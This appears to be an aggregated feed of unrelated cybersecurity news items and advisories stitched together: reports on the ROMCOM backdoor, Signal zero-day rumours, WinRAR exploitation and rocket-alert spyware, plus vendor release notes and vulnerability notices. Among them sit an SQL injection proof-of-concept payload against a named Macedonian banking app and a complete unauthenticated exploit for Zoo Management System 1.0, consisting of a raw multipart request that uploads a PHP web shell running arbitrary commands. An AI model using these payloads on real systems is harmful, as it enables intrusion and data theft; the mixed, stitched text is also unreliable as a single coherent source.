By Deeba Ahmed
Watch out, ladies!
This is a post from HackRead.com Read the original post: ROMCOMLITE: Stealthier Version of ROMCOM Backdoor Targets Female Politicians

*   **Japanese cybersecurity firm **Trend Micro**** **has detected a new malware attack campaign** **dubbed ROMCOMLITE.**

*   **Cyberespionage gang Void Rabisu is targeting female Politicians and government officials. with the new ROMCOM backdoor variant**.

*   **This new variant is compact and stealthier than its predecessor.**

*   **Attackers are using spear-phishing to distribute the backdoor through fake meeting invites.**

*   **If the malware invades a system successfully, it can harvest data, execute remote commands, or capture screenshots.**

A notorious cyberespionage group Void Rabisu, aka Storm-0978, Tropical Scorpius, and UNC2596, has launched a brand-new campaign targeting female political leaders and government officials using a revamped version of a previously detected ROMCOM backdoor.

Hackread.com had reported in July 2023 that Void Rabisu is intensifying its efforts to target politicians, citing a report from the BlackBerry Threat Research and Intelligence team about discovering a campaign where the group targeted Ukraine and NATO supporters with the ROMCOM backdoor RAT delivered via malicious documents.

The ROMCOMLITE campaign was discovered by Japanese cybersecurity firm Trend Micro. This new variant, dubbed ROMCOM 4.0 by Trend Micro and Peapod by Microsoft, allows attackers to gain unauthorized access to the target’s computers and steal sensitive data.

The backdoor was detected in early August, and the malware analysis was published on 31 October. In the report, Feike Hacquebord and Fernando Merces explained that Void Rabisu’s targets were attendees of the Women Political Leaders (WPL) Summit held in Brussels in June 2023.

For your information, Void Rabisu is a sophisticated, hybrid group that conducts espionage and financially motivated attacks and prefers using the Cuba ransomware. It also serves as an APT actor targeting government and military entities/officials.

The gang was discovered first in 2022, but researchers agree that it has been active for a long time. They also suspect this group harbours a geopolitical agenda, as most of its previous campaigns targeted the Ukrainian government/military and EU political/government governments.

In the recent campaign, Trend Micro noted that the backdoor payload was embedded in a malicious copy of the WPL Summit’s official website to improve gender equality in politics. The malicious new backdoor ROMCOM 4.0 is designed to evade detection and remain hidden on the infected system to avoid raising suspicion.

As per the report, the Videos &photos link of the original domain redirects the visitor to a Google Drive folder containing the event’s photographs. Then the fake website (wplsummitcom) directs the visitor to a OneDrive folder containing two compressed files and an executable file (titled: Unpublished Pictures 1-20230802T122531-002-sfx.exe), which is malware.

The gang created this fake website on 8 August, primarily to attract visitors from the original WPL summit domain. The executable file is signed with a valid certificate by a firm called Elbor LLC and extracts 56 photos from its resource section after the user clicks on Extract.

Fake Malicious Website for the WPL Summit 2023 and the folder downloaded by clicking on the ‘Videos & Photos’ contains images and malware downloader (Screenshot Credit: Trend Micro)

Pictures dropped by the malware downloader from the event – According to Trend Micro, these images have been gathered by hackers from different social media posts.

Attackers use spear-phishing tactics to lure their targets. They send fake meeting invitations and other lures so that the targets open malicious attachments or click on links containing the malware.

This is a similar tactic Void Rabisu has used in its campaign discovered in June 2023, where the gang used lures related to the Ukrainian World Congress and the July NATO summit to deliver a zero-day exploit based on an RCE vulnerability in MS Office and Windows HTML, tracked as CVE-2023-36884. Microsoft disclosed this campaign in July.

However, Trend Micro report reveals that the group has used a new tactic in this campaign involving TLS-enforcing by the RomCom C2 servers to make discovering ROMCOM’s infrastructure hard to detect.

“We observed Void Rabisu using this technique in a May 2023 RomCom campaign that spread a malicious copy of the legitimate PaperCut software, in which the C2 server ignored requests that were not conformant,” the report read.

Trend Micro claims there’s no evidence to believe Void Rabisu is a state-sponsored actor. Still, it is clear that the group is trying to benefit from the “extraordinary geopolitical circumstances caused by the war in Ukraine.”

****_RELATED ARTICLES_****

1.  Hackers Target Israeli Rocket Alert App Users with Spyware
2.  Gender Diversity in Cybercrime Forums: Women Users on the Rise
3.  Israeli Rabbi arrested for hacking CCTV cameras at women’ bathing suit shop

ROMCOMLITE: Stealthier Version of ROMCOM Backdoor Targets Female Politicians

In Terminalfour before 8.3.16, misconfigured LDAP users are able to login with an invalid password.

**General****Google Analytics changes**

RDSM-33435

In this version, we have made two significant changes to how Google Analytics works in the product:

**Removal of the Google Analytics Dashboard**

*   Google Analytics data will now only be viewable in Direct Edit
    *   the Analytics Dashboard is not to be confused with the Dashboard Module, which we intend to continue supporting.
    *   if you'd still like to display Google Analytics data in Terminalfour, we recommend using Google Looker Studio and embedding your chart as an iFrame with the Dashboard Module. You can read an article on doing just that here  

**Terminalfour now supports Google Analytics 4**

*   Google will stop collecting Universal Analytics on July 1st, 2023, so we have added support for Google Analytics 4 in this version. From 8.3.16, only Google Analytics 4 data will be viewable in Terminalfour
*   We've updated the documentation on adding Google Analytics to Terminalfour , so whether you are starting from scratch or updating an existing configuration, you should take a look.

**Improvements to Direct Edit**

RDSM-33542

Following the Direct Edit enhancements in 8.3.15 we've made further improvements to how JavaScript is implemented. This will allow content in carousels, galleries and slides to be more easily editable in Direct Edit.

**More flexibility from Broken Links Reporting 🔗**

RDSM-33935

We've updated the Broken Links reporting tool to improve performance and make it easier to filter unwanted links. Now you can use basic regular expressions on the excluded URLs page:

*   to exclude anchor links, add ^#* 
*   to exclude anchor links, add ^mailto:[^s]*

**Formatting internal links just got easier 👍**

RDSM-36453

We've had a lot of positive feedback since we upgraded TinyMCE in 8.3.12, but one thing that has come up a few times is how difficult it can be to add custom formatting to Section and Content Links. We've changed it so a double click is now required to show the options modal, making it easier to select the text and add formatting.

**Kerberos has been removed 🫡**

RDSM-33435

We want to thank Kerberos for its service and wish it all the best in the future. We deprecated it back in 8.3.13 and are removing the code in this release.

**Security fix (RDSM-36840)**

This update resolves an authentication vulnerability (CVE-2023-29484) where, given specific conditions, an LDAP user with an incorrectly configured LDAP identifier could log into the Terminalfour platform using an invalid password.

By default, an imported LDAP user would have the correct LDAP identifier set. To exploit this vulnerability the LDAP identifier of an importer user would need to have been manually altered to an incorrect value.

With this release, a user with an incorrectly set LDAP identifier is no longer able to log into the Terminalfour platform with an incorrect password.

**Minor issues****The filter value in the Content tab persists across Sections**

RDSM-33745

When you filtered for a value in the Content Item in a Section, that value would persist in the next Section you visited, which could cause confusion. It's fixed now.

**After adding a Child Section, the Site Structure listing didn't update**

RDSM-36773

The Site Structure is immediately updated when you add a Child Section from the Child Section tab.

**Don't show the table options in the context menu when there's no table**

RDSM-34084

Previously, when you right-clicked in TinyMCE or Direct Edit, you would see a list of table options in the context menu, whether or not you were editing a table. Now you'll only see table options when you are editing a table which should help speed you up (if Hick's Law is anything to go by).

CVE-2023-29484: Terminalfour 8.3.16 Release Notes

It's been a year since its last communication and attack on Iran — but the conflict with Hamas appears to have reactivated the group.

A pro-Israeli hacktivist group named Predatory Sparrow re-emerged in the past week.

Citing the current Gaza conflict, last week the group sent the first tweet in more than a year the group, saying: "You think this is scary? We're back. We hope you're following the events in Gaza" — with a link to a report on the US sending fighter planes and warships to support Israel.

Predatory Sparrow is a known threat that researchers believe to be a relatively sophisticated Israeli hacking operation. It has a history of destructive attacks in Iran, designed to embarrass the Iranian government.

According to Cyberscoop, in October 2021 an attack was carried out on an Iranian payment system linked to a national network of fuel pumps, while in June 2022 multiple attacks were carried out on steel facilities apparently in response to unspecified acts of "aggression" carried out by the Islamic Republic.

John Hultquist, chief analyst for Mandiant Intelligence at Google Cloud, said at a press event last week that having taken credit for a series of attacks inside Iran, the group's timely reappearance makes it "certainly a player to watch."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Pro-Israeli Hacktivist Group 'Predatory Sparrow' Reappears

By Deeba Ahmed
Zero-Day Scare: Signal Messaging App Emerges Unscathed After Thorough Probe.
This is a post from HackRead.com Read the original post: Signal Zero-Day Vulnerability Rumors Refuted by Company

On Saturday, rumours began circulating regarding a potential Signal zero-day vulnerability that could impact the security and privacy of the messaging app’s users.

****_KEY FINDINGS_****

*   **On Saturday, a rumour originated that the Signal messaging app has a zero-day vulnerability.**

*   **After extensive investigation, Signa has confirmed that it didn’t find any evidence that a zero-day exists.**

*   **Rumours originated from an unverified source, shocking everyone and making users feel wary of using the app.**

*   **Signal has reiterated its commitment to ensuring user privacy and data security in its X post.**

Zero-day vulnerabilities refer to disclosed but unpatched bugs in a system or device. These bugs are worrisome because malicious actors can exploit them before the software developers release a patch and can cause damages amounting to millions of dollars.

The popular encrypted messaging app, Signal, was recently in the news after an unverified source claimed the app contained a zero-day vulnerability. The company quickly launched an investigation and found no evidence to support this claim.

In a post on X (formerly Twitter), Signal categorically denied that a zero-day bug exists in the system while reiterating its commitment to upholding user privacy and data security. The company stated that it has a robust mechanism to detect and address potential bugs/vulnerabilities.

“PSA (public service announcement): we have seen the vague viral reports alleging a Signal 0-day vulnerability. After a responsible investigation, we have no evidence that suggests this vulnerability is real – nor has any additional info been shared via our official reporting channels,” Signal’s post read.

The company also wrote that it contacted government officials as USG was quoted as a source in the ‘copy-paste report,’ revealing that the officials denied making any such claim.

“We also checked with people across the US government, since the copy-paste report claimed USG as a source. Those we spoke to have no info suggesting this is a valid claim.”

> We also checked with people across US Government, since the copy-paste report claimed USG as a source. Those we spoke to have no info suggesting this is a valid claim.
> 
> We take reports to \[email protected\] very seriously, and invite those with real info to share it there. 2/
> 
> — Signal (@signalapp) October 16, 2023

The rumours regarding zero-day in the Signal app originated from a single, unverified source on Saturday afternoon and spread like wildfire. 

Reportedly, the bug was associated with the General Links Previews feature, leading to a complete device takeover. Allegedly, the bug could be mitigated by disabling this feature in the app.

Now that Signal has confirmed no zero-day exists in the app, users can breathe a sigh of relief and continue using this app confidently. Signal also aims to upgrade its cryptographic specifications to prevent the threat of cyberattacks facilitated by quantum computers.

Zero-day vulnerabilities still remain a cause of concern within the cybersecurity community, as many bugs are discovered every year. Google’s Project Zero reported 50 zero days in the first nine months of this year, which is much higher than zero days discovered in 2022.

****_related articles_****

1.  Signal CEO hacks Cellebrite cellphone hacking, cracking tool
2.  How to use Signal Messenger face blur tool on Android & iOS
3.  Court docs show FBI can unlock iPhones, access Signal messages
4.  Colonial Pipeline Denies Breach by RANSOMEDVC Ransomware Group
5.  Facebook blocks Signal from using ads to show Instagram data collection

Signal Zero-Day Vulnerability Rumors Refuted by Company

NLB mKlik Makedonija version 3.3.12 suffers from a remote SQL injection vulnerability.

    NLB mKlik Makedonija 3.3.12 SQL InjectionVendor: NLB Banka AD SkopjeProduct web page: https://www.nlb.mkGoogle Play: https://play.google.com/store/apps/details?id=hr.asseco.android.jimba.tutunskamk.productionAffected version: 3.3.12Summary: NLB mKlik е мобилна апликација наменета за физички лица,корисници на услугите на НЛБ Банка, која овозможува преглед наразличните продукти кои корисниците ги имаат во Банката како иизвршување на различни видови на трансакции на едноставен и предсе безбеден начин во било кој период од денот. NLB mKlik апликацијатаможе да се користи со Android верзија 5.0 или понова.Desc: The mobile application or the affected API suffers from an SQLInjection vulnerability. Input passed to the parameters that areassociated to international transfer is not properly sanitised beforebeing returned to the user or used in SQL queries. This can be exploitedto manipulate SQL queries by injecting arbitrary SQL code and disclosesensitive information.Tested on: Android 13Vulnerability discovered by Neurogenesia                            @zeroscienceAdvisory ID: ZSL-2023-5797Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5797.php23.12.2022--Incident ID: ZSL-122022-NLBTHR------------------------------DB data disclosure PoC (international transfer details/description trigger):++[select alfa1+' девизен прилив' opis from pts (nolock) where unikum =dbo.dodajnuli(:unikum ,14) and kod = 15111]-

NLB mKlik Makedonija 3.3.12 SQL Injection

Zoo Management System version 1.0 suffers from a remote shell upload vulnerability. This version originally had a shell upload vulnerability discovered by D4rkP0w4r that leveraged the upload CV flow but this particular finding leverages the save_animal flow.

# Exploit Title: Zoo Management System 1.0 - Unauthenticated RCE  
# Date: 16.10.2023  
# Exploit Author: Çağatay Ceyhan  
# Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html#google_vignette  
# Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database  
# Version: 1.0  
# Tested on: Windows 11

## Unauthenticated users can access /zoomanagementsystem/admin/public_html/save_animal address and they can upload malicious php file instead of animal picture image without any authentication.

POST /zoomanagementsystem/admin/public_html/save_animal HTTP/1.1  
Host: localhost  
Content-Length: 6162  
Cache-Control: max-age=0  
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Windows"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8NY8zT5dXIloiUML  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/zoomanagementsystem/admin/public_html/save_animal  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="animal_id"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_given_name"

kdkd  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_species_name"

ıdsıd  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_dob"

1552-02-05  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_gender"

m  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_avg_lifespan"

3  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="class_id"

2  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="location_id"

2  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_dietary_req"

2  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_natural_habitat"

faad  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_pop_dist"

eterter  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_joindate"

5559-02-06  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_height"

2  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_weight"

3  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_description"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="images[]"; filename="ultra.php"  
Content-Type: application/octet-stream

<?php  
if (!empty($_POST['cmd'])) {  
    $cmd = shell_exec($_POST['cmd']);  
}  
?>  
<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="utf-8">  
    <meta http-equiv="X-UA-Compatible" content="IE=edge">  
    <meta name="viewport" content="width=device-width, initial-scale=1">  
    <title>Web Shell</title>  
    <style>  
        * {  
            -webkit-box-sizing: border-box;  
            box-sizing: border-box;  
        }

        body {  
            font-family: sans-serif;  
            color: rgba(0, 0, 0, .75);  
        }

        main {  
            margin: auto;  
            max-width: 850px;  
        }

        pre,  
        input,  
        button {  
            padding: 10px;  
            border-radius: 5px;  
            background-color: #efefef;  
        }

        label {  
            display: block;  
        }

        input {  
            width: 100%;  
            background-color: #efefef;  
            border: 2px solid transparent;  
        }

        input:focus {  
            outline: none;  
            background: transparent;  
            border: 2px solid #e6e6e6;  
        }

        button {  
            border: none;  
            cursor: pointer;  
            margin-left: 5px;  
        }

        button:hover {  
            background-color: #e6e6e6;  
        }

        .form-group {  
            display: -webkit-box;  
            display: -ms-flexbox;  
            display: flex;  
            padding: 15px 0;  
        }  
    </style>

</head>

<body>  
    <main>  
        <h1>Web Shell</h1>  
        <h2>Execute a command</h2>

        <form method="post">  
            <label for="cmd"><strong>Command</strong></label>  
            <div class="form-group">  
                <input type="text" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>"  
                       onfocus="this.setSelectionRange(this.value.length, this.value.length);" autofocus required>  
                <button type="submit">Execute</button>  
            </div>  
        </form>

        <?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?>  
            <h2>Output</h2>  
            <?php if (isset($cmd)): ?>  
                <pre><?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?></pre>  
            <?php else: ?>  
                <pre><small>No result.</small></pre>  
            <?php endif; ?>  
        <?php endif; ?>  
    </main>  
</body>  
</html>  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_med_record"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_transfer"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_transfer_reason"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_death_date"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_death_cause"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_incineration"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="m_gest_period"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="m_category"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="m_avg_body_temp"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="b_nest_const"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="b_clutch_size"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="b_wingspan"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="b_color_variant"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="f_body_temp"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="f_water_type"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="f_color_variant"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="rep_type"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="clutch_size"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="num_offspring"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="submit"

------WebKitFormBoundary8NY8zT5dXIloiUML--

## After the post request sent by an attacker, the malicious file can be seen under the http://localhost/zoomanagementsystem/img/animals/. the attacker can execute arbitrary command on http://localhost/zoomanagementsystem/img/animals/ultra_1697442648.php.

Zoo Management System 1.0 Shell Upload

Pro-Russian hacking groups have exploited a recently disclosed security vulnerability in the WinRAR archiving utility as part of a phishing campaign designed to harvest credentials from compromised systems.
"The attack involves the use of malicious archive files that exploit the recently discovered vulnerability affecting the WinRAR compression software versions prior to 6.23 and traced as

Pro-Russian hacking groups have exploited a recently disclosed security vulnerability in the WinRAR archiving utility as part of a phishing campaign designed to harvest credentials from compromised systems.

"The attack involves the use of malicious archive files that exploit the recently discovered vulnerability affecting the WinRAR compression software versions prior to 6.23 and traced as CVE-2023-38831," Cluster25 said in a report published last week.

The archive contains a booby-trapped PDF file that, when clicked, causes a Windows Batch script to be executed, which launches PowerShell commands to open a reverse shell that gives the attacker remote access to the targeted host.

Also deployed is a PowerShell script that steals data, including login credentials, from the Google Chrome and Microsoft Edge browsers. The captured information is exfiltrated via a legitimate web service webhook\[.\]site.

CVE-2023-38831 refers to a high-severity flaw in WinRAR that allows attackers to execute arbitrary code upon attempting to view a benign file within a ZIP archive. Findings from Group-IB in August 2023 disclosed that the bug had been weaponized as a zero-day since April 2023 in attacks targeting traders.

The development comes as Google-owned Mandiant charted Russian nation-state actor APT29's "rapidly evolving" phishing operations targeting diplomatic entities amid an uptick in tempo and an emphasis on Ukraine in the first half of 2023.

The substantial changes in APT29's tooling and tradecraft are "likely designed to support the increased frequency and scope of operations and hinder forensic analysis," the company said, and that it has "used various infection chains simultaneously across different operations."

Some of the notable changes include the use of compromised WordPress sites to host first-stage payloads as well as additional obfuscation and anti-analysis components.

AT29, which has also been linked to cloud-focused exploitation, is one of the many activity clusters originating from Russia that have singled out Ukraine following the onset of the war early last year.

In July 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) implicated Turla in attacks deploying the Capibar malware and Kazuar backdoor for espionage attacks on Ukrainian defensive assets.

"The Turla group is a persistent adversary with a long history of activities. Their origins, tactics, and targets all indicate a well-funded operation with highly skilled operatives," Trend Micro disclosed in a recent report. "Turla has continuously developed its tools and techniques over years and will likely keep on refining them."

Ukrainian cybersecurity agencies, in a report last month, also revealed that Kremlin-backed threat actors targeted domestic law enforcement entities to collect information about Ukrainian investigations into war crimes committed by Russian soldiers.

"In 2023, the most active groups were UAC-0010 (Gamaredon/FSB), UAC-0056 (GRU), UAC-0028 (APT28/GRU), UAC-0082 (Sandworm/GRU), UAC-0144 / UAC-0024 / UAC-0003 (Turla), UAC-0029 (APT29/ SVR), UAC-0109 (Zarya), UAC-0100, UAC-0106 (XakNet), \[and\] UAC-0107 (CyberArmyofRussia)," the State Service of Special Communications and Information Protection of Ukraine (SSSCIP) said.

CERT-UA recorded 27 "critical" cyber incidents in H1 of 2023, compared to 144 in the second half of 2022 and 319 in the first half of 2022. In total, destructive cyber-attacks affecting operations fell from 518 to 267.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Pro-Russian Hackers Exploiting Recent WinRAR Vulnerability in New Campaign

By Waqas
If you've downloaded a rocket alert app from a third-party source, ensure it's spyware-free and delete it from your device.
This is a post from HackRead.com Read the original post: Hackers Target Israeli Rocket Alert App Users with Spyware

While the identity of the culprits behind this spyware campaign remains uncertain, their tactics closely resemble those used by pro-Palestinian hackers, such as AnonGhost.

On October 9th, 2023, **Hackread.com reported** on the infiltration by pro-Palestinian hackers associated with AnonGhost into the Red Alert app, an Israeli application designed by Kobi Snir exclusively for delivering missile and rocket alerts to the Israeli population. Seizing this opportunity, AnonGhost maliciously disseminated fabricated rocket, missile, and even nuclear bomb alerts to Israelis.

Now, Cloudflare’s Cloudforce One Threat Operations Team has uncovered a similar incident, this time targeting a different rocket alert app. The researchers identified a malicious website (redalertsme) hosting a Google Android Application (APK) impersonating the legitimate RedAlert – Rocket Alerts application originally created by Elad Nava. The motive behind this malicious website was to infect unsuspecting Israeli app users with spyware.

Rocket alert apps have gained immense popularity in Israel, providing crucial alerts to citizens about incoming air strikes, which have sadly become an all too common occurrence. The misuse of these applications, as witnessed in the recent hack, has the potential to create widespread panic and further escalate an already tense situation.

According to a **blog post** by Cloudflare, the malicious domain in question offered both iOS and Android versions of the mobile application. However, while the link for the iOS version directed users to the legitimate App Store page, the Android version was a manipulated variant.

Screenshot of the malicious website (Cloudflare)

The malicious application, while retaining elements of the original code, had been equipped with the capability to collect sensitive user data. This included access to contacts, call logs, text messages, account information, SIM card details, and a list of installed applications on the victim’s device.

To make matters worse, the malicious app operated stealthily in the background, continuously harvesting data from the compromised device. The stolen information was then sent to a remote server.

Although the data was encrypted, the use of RSA encryption with a bundled public key within the app made it theoretically possible for anyone intercepting the data packets to decrypt the information.

The website hosting the spyware-infested version of RedAlert has since been taken down. However, users who may have unwittingly installed this malicious application remain at risk. They are advised to take immediate action to cleanse their devices of the spyware.

To determine whether their devices have been compromised, users are urged to check the permissions that the app has requested. Suspicious permissions include access to call logs, contacts, phone features, and SMS capabilities. These indicators should be taken seriously to ensure the security of their devices and personal information.

While malicious **AI chatbots like WormGPT and FraudGPT** assist malicious actors in generating novel ideas with user-friendly technology, traditional cyber warfare tactics, such as hackvisits, persist. Presently, both pro-Palestinian and Israeli hackvisits **are focusing on** each other’s critical ICS products.

As hackers continuously innovate, it is crucial for users to remain vigilant and informed about safeguarding themselves from the ever-evolving landscape of cyber threats.

****_RELATED ARTICLES_****

1.  Israel’s Channel 10 TV Station Hacked by Hamas
2.  Hamas hacked the smartphones of over 100 IDF soldiers
3.  Hamas posed as women to con IDF into downloading malware
4.  Iranian Hackers Posed as Israelis in Targeted LinkedIn Phishing Attack
5.  Hamas hacked phones of IDF soldiers with seductive phones of women

Hackers Target Israeli Rocket Alert App Users with Spyware

SaaS Security’s roots are in configuration management. An astounding 35% of all security breaches begin with security settings that were misconfigured. In the past 3 years, the initial access vectors to SaaS data have widened beyond misconfiguration management. “SaaS Security on Tap” is a new video series that takes place in Eliana V's bar making sure that the only thing that leaks is beer (

SaaS Security / Cybersecurity

SaaS Security's roots are in configuration management. An astounding 35% of all security breaches begin with security settings that were misconfigured. In the past 3 years, the initial access vectors to SaaS data have widened beyond misconfiguration management. "**SaaS Security on Tap**" is a new video series that takes place in Eliana V's bar making sure that the only thing that leaks is beer (maximum), and not SaaS data. This series takes a look at the key concepts within SaaS security and educates organizations on what new threat vectors need to be addressed.

****The Annual SaaS Security Survey Report: 2024 Plans and Priorities****

With the increase in SaaS application use, it's no surprise that incidents are up. The SaaS Security on Tap series covers this year's SaaS Security report which found that 55% of organizations have experienced a SaaS security incident within the last two years, including data leaks, data breaches, ransomware attacks, and malicious applications.

The report was not all doom and gloom. As Eliana V points out, companies are recognizing that manual audits and CASB deployments are only _partial_ solutions at best. A surprising 80% of companies are either using or planning on using a SaaS Security Posture Management (SSPM) tool, like Adaptive Shield, for automated configuration and SaaS security monitoring by September 2024. That should take SaaS applications to a far more secure place than they are today.

****Identity and Access Governance – Getting into the Who in SaaS Security****

SaaS Security on Tap reveals that as more organizations adopt SSPM, they are enhancing their visibility into SaaS app users. SaaS experts have come to recognize the critical nature of identity and access governance in securing SaaS apps. While much of SaaS security falls under the control of app owners, responsibility for identity and access governance falls squarely within the responsibility of the security and central IT team. They manage the company's Identity Provider (IdP) and need visibility to see which users are accessing applications, the level of access they have, and the type of users they are.

Identity security is all about ensuring that identity and access tools and policies are in place. Security teams need a high degree of visibility to know which users, including external users, have access to each application and to what extent. To fully quantify the risk emanating from users, they also need visibility into the devices used to access those applications and the ability to monitor high-privilege users.

****Uncovering the Risks & Realities of Third-Party Connected Apps****

Third-party application integrations, also known as SaaS-to-SaaS access, have also developed into a serious attack vector. These applications, which are integrated through OAuth protocols with the click of a button, improve workflows and help businesses get more out of their applications. While many of these SaaS-to-SaaS applications are harmless, they pose a significant risk. 3rd-party apps often ask for intrusive permission scopes, like Eliana V quips in the On Tap video (below), "some scopes ask for your firstborn child."

Users are granting permissions that allow read/write access, the ability to send email as a user, and most concerning, the ability to delete entire folders and drives of data. Eliana V points out that researchers found organizations with 10,000 SaaS users averaged over 6,700 applications connected to their Google Workspace, of which 89% requested medium- or high-risk permission scopes.

****A Few Words About SaaS Security On Tap****

SaaS Security on Tap provides a fast-paced, entertaining look at the challenges and solutions organizations face as they try to secure their data in SaaS apps.

Hosted by Eliana V from the SaaS Security On Tap bar, the series gets inside the issues facing security teams and their application-owner partners. Take misconfiguration management. Using entertaining analogies and powerful examples, Eliana V demonstrates the dangers of misconfigurations and the ease with which organizations err with their settings.

Check out the trailer…and like and subscribe if you want more.

**_Don't miss an episode of_** **_Saas Security On Tap_****_, the entertaining new video series that gets to the heart of SaaS security._**

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

The Fast Evolution of SaaS Security from 2020 to 2024 (Told Through Video)

Cross-Site Request Forgery (CSRF) vulnerability in Pixelative, Mohsin Rafique AMP WP – Google AMP For WordPress plugin <= 1.5.15 versions.

**Solution**

 No fix

No patched version is available.

qilin\_99 discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress AMP WP Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

Tag

#google